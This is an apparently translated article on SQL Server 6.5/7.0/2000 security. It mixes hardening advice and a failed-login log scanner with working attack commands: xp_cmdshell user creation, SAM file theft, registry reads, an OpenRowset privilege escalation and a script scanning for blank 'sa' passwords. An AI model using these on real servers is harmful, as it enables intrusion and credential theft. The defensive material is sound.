There are many ways to break into an NT server today, such as exploiting IIS vulnerabilities, but what not everyone knows is that the SQL Server database attached to an NT server is also a very common route in. See this news report: http://www.vnunet.com/news/1110938. Herbless, for example, defaced sites such as Legoland.co.uk by breaking in through SQL Server. So protecting SQL Server is no less important, and I have collected some of its vulnerabilities here for reference, heh.

----------------------------------------------------------------

Let's first look at the network protocol libraries supported by the SQL Server service:

  SQL Server Network Protocol Libraries
  ----------------------------------------------------------------------------------
  Protocol library   | Possible vulnerabilities                             | Encrypted?
  -------------------+------------------------------------------------------+-----------
  Named Pipes        | - Uses the NT SMB ports (TCP 139, UDP 137/138) to    | No
                     |   communicate. The firewall can filter these, but    |
                     |   unrestricted access from the internal network is   |
                     |   still a weakness.                                  |
                     | - User name, password and data are not encrypted in  |
                     |   transit; anyone can capture them with a sniffer.   |
  -------------------+------------------------------------------------------+-----------
  IP Sockets         | - Port 1433 is open by default; a port scanner       | No
                     |   reveals it.                                        |
                     | - Traffic can be captured by a sniffer.              |
  -------------------+------------------------------------------------------+-----------
  Multi-Protocol     | - The client must support NT RPCs; this may cause    | Yes
                     |   problems in mixed environments.                    |
                     | - Uses random TCP ports by default, but a fixed port |
                     |   mapping can be configured for the firewall (see    |
                     |   KB Q164667).                                       |
                     | - Note that traffic is only encrypted if the         |
                     |   encryption option is selected; by default it is    |
                     |   not.                                               |
  -------------------+------------------------------------------------------+-----------
  NWLink             | - Data can be intercepted by a sniffer.              | No
  -------------------+------------------------------------------------------+-----------
  AppleTalk (ADSP)   | - Data can be intercepted by a sniffer.              | No
  -------------------+------------------------------------------------------+-----------
  Banyan Vines       | - Data can be intercepted by a sniffer.              | No
  ----------------------------------------------------------------------------------

General recommendation: if you can use Named Pipes or Multi-Protocol with integrated (NT) security, use those libraries, and if possible use Multi-Protocol with the encryption option enabled. If none of the above is possible, use the IP Sockets library, change its default port, and check the system to make sure no sniffer is present. Also consider using a web service or COM component as the application's business object layer, with a secure channel between the middle tier and the SQL service; there are many third-party products that can encrypt this communication.
----------------------------------------------------------------

Next, how does authentication work in SQL Server?

The security mode defines how SQL Server authenticates the users who connect to it. The table below describes the SQL Server 6.5 security modes and what changed in SQL Server 7.0.

  ------------------------------------------------------------------------------------------------
  Security mode        | SQL Server 6.5                              | Changes in SQL Server 7.0
  ---------------------+---------------------------------------------+--------------------------------
  Standard             | - Logins are defined in SQL Server and      | - A separate standard mode
  (standard mode)      |   given a password.                         |   no longer exists.
                       | - SQL Server login account and              |
  ---------------------+---------------------------------------------+--------------------------------
  Integrated           | - NT accounts are mapped to SQL Server       | - Renamed "Windows NT Only"
  (integrated mode)    |   logins with SQL Security Manager.          |   mode.
                       | - The user connects to SQL Server with the   | - Works only on NT; not
                       |   NT credentials, with no separate login     |   supported on Win9x.
                       |   and password.                              | - NT groups can be granted
                       | - The password is never stored in the        |   access directly (note the
                       |   application and never crosses the network  |   BUILTIN group).
                       |   in plaintext.                              |
                       | - SQL Server authenticates users through NT, |
                       |   so account expiry and similar policies     |
                       |   apply.                                     |
                       | - Requires the Named Pipes or Multi-Protocol |
                       |   library.                                   |
  ---------------------+---------------------------------------------+--------------------------------
  Mixed                | - Supports both of the above; clients that   | - Becomes "SQL Server and
  (mixed mode)         |   cannot establish a trusted NT connection   |   Windows NT" mode.
                       |   fall back to a standard login.             | - Prefer Windows NT Only mode.
  ------------------------------------------------------------------------------------------------

Login is only the first step. Once logged in, the user still has to access individual databases, so every database the user may use must have an entry for that user in its sysusers table.

Therefore, check whether a "guest" account exists in your databases; otherwise it grants access to your database while you are not paying attention.
For details, please refer to Microsoft's site:
http://www.microsoft.com/technet/sql/technote/secure.asp
-------------------------------------------------- -------------------
Some security issues in SQL Server:

The "sa" account has an empty password by default, and sa is the built-in system administrator of SQL Server, so through the xp_cmdshell extended stored procedure we can run operating-system commands, for example:

  xp_cmdshell "net user testuser ugothacked /add"

and then:

  xp_cmdshell "net localgroup administrators testuser /add"

With that, an attacker has added a user on the SQL Server host. Doing this remotely normally requires port 1433 to be reachable, connecting with a SQL Server client.

Of course, xp_cmdshell "rdisk /s" can also be used: it rebuilds the repair information in the \winnt\repair directory without prompting the user. The attacker can then connect to an existing SMB share or create one:

  xp_cmdshell "net share getsam=c:\winnt\repair"

fetch the file through the share, and then run L0phtCrack on it. If the SMB ports are blocked by the firewall, the attacker can instead copy the sam._ file into the web directory and fetch it through an anonymous browser.
If IIS is not running, why not use TFTP :). OK, from this compromised SQL Server an attacker can look for other machines to extend the results. Below is a SQL script that lists other SQL Servers on the network whose "sa" account has an empty password:

----------------------------------------------------------------
  -- Create temp table to store enumerated servers
  SET NOCOUNT ON
  CREATE TABLE #temp (shelldump varchar(255))
  INSERT #temp EXEC xp_cmdshell 'osql -L'
  DECLARE @current_server varchar(255), @conn_string varchar(255)
  DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp
  OPEN sql_cursor
  FETCH NEXT FROM sql_cursor INTO @current_server
  -- Loop through potential targets and check for null sa accounts
  -- If target is vulnerable, version information will be displayed
  WHILE @@FETCH_STATUS = 0
  BEGIN
    IF @current_server <> 'Servers:'
    BEGIN
      SELECT @current_server = rtrim(ltrim(@current_server))
      SELECT @conn_string = 'exec xp_cmdshell ''osql -S ' + @current_server
                          + ' -U sa -P "" -Q "select @@version"'''
      PRINT 'Attempting connection to server: ' + @current_server
      EXECUTE (@conn_string)
      PRINT '======================================================'
    END
    FETCH NEXT FROM sql_cursor INTO @current_server
  END
  -- Clean up
  CLOSE sql_cursor
  DEALLOCATE sql_cursor
  DROP TABLE #temp
----------------------------------------------------------------

Of course, some people disable the xp_cmdshell extended stored procedure. In that case the following can also be used:

  xp_regread "HKEY_LOCAL_MACHINE", "SECURITY\SAM\Domains\Account", "F"

If the MSSQLServer service runs under the LocalSystem account and syskey is not installed on the system, this returns the encrypted passwords or SIDs from the registry as a result set.

----------------------------------------------------------------

Another vulnerability is privilege elevation through ad hoc heterogeneous queries. See the Microsoft description: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp. The following exploit for that vulnerability gains elevated rights:

  select * from OpenRowset('SQLOLEDB', 'Trusted_Connection=Yes;Data Source=MyServer',
                           'set fmtonly off execute master..xp_cmdshell ''dir c:\''')

This is a favourite kind of command; other commands can be run the same way, think about it.

----------------------------------------------------------------

Another, the most recent vulnerability, is the extended stored procedure parameter parsing vulnerability, described in detail at http://www.microsoft.com/technet/security/bulletin/ms00-092.asp. The main problem is the ODS API function srv_paraminfo(), which extended stored procedures use to parse their parameters when they are called, for example:

  xp_displayparamstmt (xprepl.dll)
  xp_enumresultset    (xprepl.dll)
  xp_showcolv         (xprepl.dll)
  xp_updatecolvbm     (xprepl.dll)

Passing an over-long string as the first parameter causes an access violation and overwrites the return address of the exception handler. Here is a useful trick: if you want to know which DLL file an extended stored procedure calls, run something like:

  select o.name, c.text from dbo.syscomments c, dbo.sysobjects o
  where c.id = o.id and o.name = 'xp_peekqueue'

This gives the DLL behind that extended stored procedure. If Microsoft has not released a patch yet, you can temporarily swap out that DLL file. Of course, some DLL files serve several extended stored procedures, so you cannot blindly change one or the others stop working; use the following to find which extended stored procedures a DLL serves:

  select o.name, c.text from dbo.syscomments c, dbo.sysobjects o
  where c.id = o.id and c.text = 'xpqueue.dll'

Fortunately Microsoft has released a patch, which you can find below, so there is no need to hunt for DLLs one by one, heh: http://support.microsoft.com/support/sql/xp_security.asp. This vulnerability was discovered by @stake, who also provide test code: http://www.atstake.com/research/advisories/2000/sqladv2-poc.c

----------------------------------------------------------------

OK, SQL Server of course has other, relatively minor vulnerabilities, such as the one found by ISS: administrator login IDs are stored in the registry with a rather simple encryption method and are easy to recover; see http://xforce.iss.net/alerts/advise45.php3. Everyone can look for the rest themselves.

----------------------------------------------------------------

Some security suggestions for SQL Server systems:

- Make sure the latest security patches are installed, as follows:
    Windows NT 4.0   - Service Pack 6a
    SQL Server 6.5   - Service Pack 5a
    SQL Server 7.0   - Service Pack 2
    (various hotfixes - check http://www.microsoft.com/download)
    SQL Server 2000  - hotfix S80233i.exe (Intel)
  Of course, everyone should also follow Microsoft's security announcements closely.
- Do not use port 1433 for IP Sockets, and if you use Multi-Protocol, change its port as well.
- Do not embed the "sa" password in any application, such as VB/Delphi apps or a global.asa file: "sa" is the default login of SQL Server, its permissions are similar to the Administrator account in Windows NT, and its password is empty by default.
- Change the passwords of the "sa" and "probe" accounts.
- Make sure SQL Server's error log is kept on an NTFS file system.
- If you do not need xp_cmdshell, do not leave the xp_cmdshell extended stored procedure in place (use sp_dropextendedproc "xp_cmdshell"). In an isql window, enter:
    use master
    sp_dropextendedproc "xp_cmdshell"
- Drop the OLE Automation stored procedures you do not need. Of course, certain features of Enterprise Manager will then no longer work. These procedures are:
    sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop
- Remove the procedures that access the registry if they are not required, as follows:
    xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite
- Remove other system stored procedures if you consider them a threat. Of course, be careful when dropping these procedures: test on a test machine first to make sure your system still completes its normal work. These procedures include:
    sp_bindsession sp_cursor sp_cursorclose sp_cursorfetch sp_cursoropen sp_cursoroption sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop sp_replcmds sp_replcounters sp_repldone sp_replflush sp_replstatus sp_repltrans sp_sdidebug xp_availablemedia xp_cmdshell xp_deletemail xp_dirtree xp_dropwebtask xp_dsninfo xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks xp_eventlog xp_findnextmsg xp_fixeddrives xp_getfiledetails xp_getnetname xp_grantlogin xp_logevent xp_loginconfig xp_logininfo xp_makewebtask xp_msver xp_perfend xp_perfmonitor xp_perfsample xp_perfstart xp_readerrorlog xp_readmail xp_revokelogin xp_runwebtask xp_schedulersignal xp_sendmail xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap xp_sprintf xp_sqlinventory xp_sqlregister xp_sqltrace xp_sscanf xp_startmail xp_stopmail xp_subdirs xp_unc_to_drive
- Remove the guest user from your databases.
- Turn off SQL Mail compatibility to prevent some Trojans and viruses.
- Set up a scheduled task that runs the following command, redirecting its output to a file or mailing it to the administrator's mailbox:
    findstr /I /C:"Login failed" \mssql7\log\*.*
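As an added example (not part of the original article), the following Python script does what the last recommendation describes in a form that can be scheduled and mailed: it scans SQL Server error-log text for failed logins, counts them per login and flags logins that exceed a threshold, such as repeated guesses against "sa". The log lines are constructed in the SQL Server 7.0 errorlog layout, and the threshold value is an assumption.

```python
import re
from collections import Counter

# Constructed sample lines in the SQL Server 7.0 errorlog layout (not a real log)
SAMPLE_LOG = """\
2000-12-01 10:15:32.45 server   Microsoft SQL Server  7.00 - 7.00.623 (Intel X86)
2000-12-01 10:15:40.10 logon    Login failed for user 'sa'.
2000-12-01 10:15:41.22 logon    Login failed for user 'sa'.
2000-12-01 10:15:42.05 logon    Login failed for user 'sa'.
2000-12-01 10:16:03.91 logon    Login succeeded for user 'app_user'. Connection: Non-Trusted.
2000-12-01 10:17:10.00 logon    Login failed for user 'probe'.
"""

# Timestamp, the "logon" source column and the user name from the message text.
# Matched case-insensitively so differences in casing do not hide events
# (findstr /C: is case-sensitive unless /I is added).
FAILED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+logon\s+"
    r"login failed for user '(?P<user>[^']*)'",
    re.IGNORECASE,
)


def failed_logins(log_text):
    """Return a list of (timestamp, user) for every failed-login line."""
    hits = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            hits.append((m.group("ts"), m.group("user")))
    return hits


def summarize(log_text, threshold=3):
    """Count failures per login and flag logins at or above the threshold.

    Returns (counts, flagged): counts maps user -> failures, flagged is the
    sorted list of users worth alerting the administrator about. The default
    threshold of 3 is an assumed value; tune it for your environment."""
    counts = Counter(user for _, user in failed_logins(log_text))
    flagged = sorted(u for u, n in counts.items() if n >= threshold)
    return dict(counts), flagged


if __name__ == "__main__":
    counts, flagged = summarize(SAMPLE_LOG)
    for user, n in sorted(counts.items()):
        print(f"{user}: {n} failed login(s)")
    print("flag for the administrator:", flagged)
```

To use it on a real server, read the errorlog files from the log directory (\mssql7\log on SQL Server 7.0) into log_text instead of SAMPLE_LOG.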